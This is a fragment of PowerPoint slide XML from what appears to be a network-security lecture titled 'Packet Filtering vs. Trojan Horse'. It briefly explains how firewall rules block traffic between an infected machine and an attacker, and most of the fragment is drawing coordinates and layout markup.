          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1117716"/>
            <a:ext cx="74472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hacker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cannot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connect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infected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machine,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as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there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no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rules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allow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traffic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coming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123.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0C961256-4A9C-D33D-A20A-0F681C581D02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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBD19A3-59FC-2A98-77CA-50EDFA484437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106</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E6A4C7C-9DB0-6546-11C9-7721B17EE004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Packet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Filtering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vs.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Trojan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Horse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432189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2A0D942-F8A8-4D13-CB55-79B28D203437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Packet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Filtering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vs.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Trojan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Horse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09A1F32-F82F-24DF-618E-5BFC1FABD033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1117716"/>
            <a:ext cx="7874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Similarly,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firewall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deny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traffic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infected machine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hacker's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PC.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D3F37B01-F69A-F9C0-F9C3-BCB79031AD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="796886" y="2117759"/>
            <a:ext cx="7776150" cy="2717800"/>
            <a:chOff x="675131" y="2116881"/>
            <a:chExt cx="7776150" cy="2717800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916BB685-9469-24AD-E76F-7B6A08A116C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="704620" y="2144730"/>
              <a:ext cx="4138929" cy="2660650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4138929" h="2660650">
                  <a:moveTo>
                    <a:pt x="1734987" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1607198" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538388" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469578" y="29504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440088" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405684" y="49174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312299" y="93431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253319" y="132770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179595" y="191780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110785" y="270459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091125" y="295046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071465" y="324550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056720" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041975" y="378642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022315" y="408147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012485" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992825" y="501578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982995" y="536000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978080" y="565505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="634349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="722863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938761" y="727780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="904356" y="732698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840461" y="752368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815886" y="767120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786396" y="786790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761821" y="801542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697927" y="875304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653692" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638947" y="1057249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1076919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609457" y="1096588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570137" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530817" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="1091671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1121176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1140845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1190020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1219524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1253946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1288368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1367047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1411304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1499818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1598167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1686681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1730938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1809617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1844039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1878461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216259" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1962058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1976810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1996480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="2006314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525902" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2055489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2084993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2114498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575052" y="2144003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579967" y="2168590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599627" y="2227599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614372" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629117" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702842" y="2380040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771651" y="2443967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820801" y="2483306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933846" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997740" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061635" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169765" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204169" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238574" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277894" y="2620994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317214" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356534" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435173" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474493" y="2596407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543303" y="2576737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582623" y="2566902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1612113" y="2552150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646518" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676007" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705497" y="2498058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739902" y="2478389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764477" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793967" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818542" y="2414462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838202" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862777" y="2468554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887352" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916841" y="2512811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946331" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="2557068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010226" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049546" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088866" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128186" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172420" y="2630829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260890" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2305125" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349360" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398509" y="2660334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462404" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="2640664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="2625912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688493" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2742558" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786793" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835943" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2875262" y="2522646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909667" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944072" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2973562" y="2429214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2998137" y="2389875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027627" y="2316113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3037457" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062032" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081691" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3165246" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3194736" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258631" y="2266939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288121" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="2222682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="2198095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381505" y="2178425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401165" y="2158755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="2134168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="2104663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3440485" y="2080076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="2050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="2021067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="1991562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="1952223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="1917801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479805" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3519125" y="1927635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3553529" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="1893213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1873544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1848956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1789947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1721103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1676846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1637507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1593250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1494901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4138412" y="1445726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1396552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123667" y="1347378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1303121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1258864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1214607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1175267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010623" y="1135928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1101506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936898" y="1072001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1047414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="998240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="983487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3558444" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3524040" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489635" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="978570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="850716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="811377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="776955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3435570" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="713028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="678606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386420" y="609762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="550753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="521248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317610" y="496661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297951" y="467156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273376" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253716" y="417982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="393395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3204566" y="373725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179991" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3121011" y="309798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3032542" y="265541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968647" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899837" y="221284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796623" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762218" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698323" y="211449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="236037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="250789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413254" y="299963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369019" y="334385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319870" y="368807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270720" y="290128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241230" y="255706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211740" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142930" y="157358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2103611" y="127853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2059376" y="98348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015141" y="78679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="59009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926671" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882437" y="24587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833287" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734987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D7567C1C-BE38-D7D0-85D5-9CFCA7E78D6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920" y="2208657"/>
              <a:ext cx="3897578" cy="2443967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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235B9BAA-980E-C816-927E-A9A1D417802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31" y="2116881"/>
              <a:ext cx="4374869" cy="2717800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62FCC7DB-A048-3B76-3CCA-3112D0C3C27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3924" y="3146549"/>
              <a:ext cx="353009" cy="561924"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6BEE88EA-F72C-DFFF-8D74-A8BE8A979973}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4638579" y="3108767"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370141" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61922" y="618016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370141" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63724" y="602430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="539326"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="551908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="421995" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51161" y="70836"/>
